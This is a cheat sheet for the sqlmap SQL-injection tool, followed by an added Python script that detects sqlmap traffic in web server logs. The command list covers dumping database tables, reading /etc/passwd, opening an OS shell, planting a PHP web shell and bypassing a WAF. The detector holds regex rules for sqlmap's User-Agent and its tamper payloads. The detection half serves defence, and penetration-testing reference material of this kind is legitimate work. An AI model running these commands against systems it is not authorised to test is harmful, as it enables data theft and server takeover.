sqlmap is an open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports a wide range of database systems and can extract data, access the filesystem, and execute commands.
```bash
# Test URL parameter for SQLi
sqlmap -u "http://target.com/page?id=1"

# With POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# With cookies/authentication
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123"

# With headers
sqlmap -u "http://target.com/api" --headers="Authorization: Bearer token"

# Database enumeration
sqlmap -u "URL" --dbs                      # List databases
sqlmap -u "URL" -D dbname --tables         # List tables
sqlmap -u "URL" -D db -T users --columns   # List columns
sqlmap -u "URL" -D db -T users --dump      # Dump data

# System information
sqlmap -u "URL" --current-user
sqlmap -u "URL" --current-db
sqlmap -u "URL" --is-dba

# OS shell access (if privileges allow)
sqlmap -u "URL" --os-shell

# File read/write
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/shell.php"

# Bypass WAF
sqlmap -u "URL" --tamper=space2comment,between
```
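On the defending side, the requests these commands generate leave recognisable traces in web server logs. The following is an added example, not part of the original page or of sqlmap: it flags sqlmap's default User-Agent and the query rewrites produced by the `space2comment` and `between` tamper scripts, and the log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); not from a real system.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /page?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Oct/2024:13:56:02 +0000] "GET /page?id=1/**/UNION/**/SELECT/**/NULL,NULL HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '203.0.113.9 - - [10/Oct/2024:13:56:03 +0000] "GET /page?id=1%20AND%205%20NOT%20BETWEEN%200%20AND%203 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '198.51.100.4 - - [10/Oct/2024:13:57:10 +0000] "GET /docs?q=between+meals HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Macintosh)"',
]

# Combined log format: ip ... "METHOD target PROTO" status bytes "referer" "user-agent"
LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
SEP = r'(?:\s|/\*\*/)+'  # whitespace, or the /**/ that space2comment puts in its place

# Hypothetical rule names -> (log field to inspect, pattern)
RULES = {
    "sqlmap-default-ua": ("ua", re.compile(r'^sqlmap/', re.I)),
    # space2comment: spaces between SQL keywords become /**/
    "space2comment": ("query", re.compile(r'\b(?:union|select|and|or|from|where)/\*\*/', re.I)),
    # between: "A > B" is rewritten as "A NOT BETWEEN 0 AND B"
    "between-rewrite": ("query", re.compile(r'\bnot' + SEP + r'between' + SEP + r'0' + SEP + r'and\b', re.I)),
}

def classify(line):
    """Return (source_ip, sorted rule names that matched), or None if unparseable."""
    m = LINE.match(line)
    if not m:
        return None
    # Decode the query string so %20 and + are compared as spaces.
    fields = {"ua": m["ua"], "query": unquote_plus(m["target"].partition("?")[2])}
    hits = sorted(name for name, (field, rx) in RULES.items() if rx.search(fields[field]))
    return m["ip"], hits

def scan(lines):
    """Return {source_ip: set of rule names} for lines that matched at least one rule."""
    findings = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            findings.setdefault(result[0], set()).update(result[1])
    return findings

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

The User-Agent rule only catches default settings, so the payload-shape rules carry the detection when the header has been changed; POST bodies and cookies are not in access logs and need inspection at the WAF or application layer.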
Supported database management systems include MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and many more.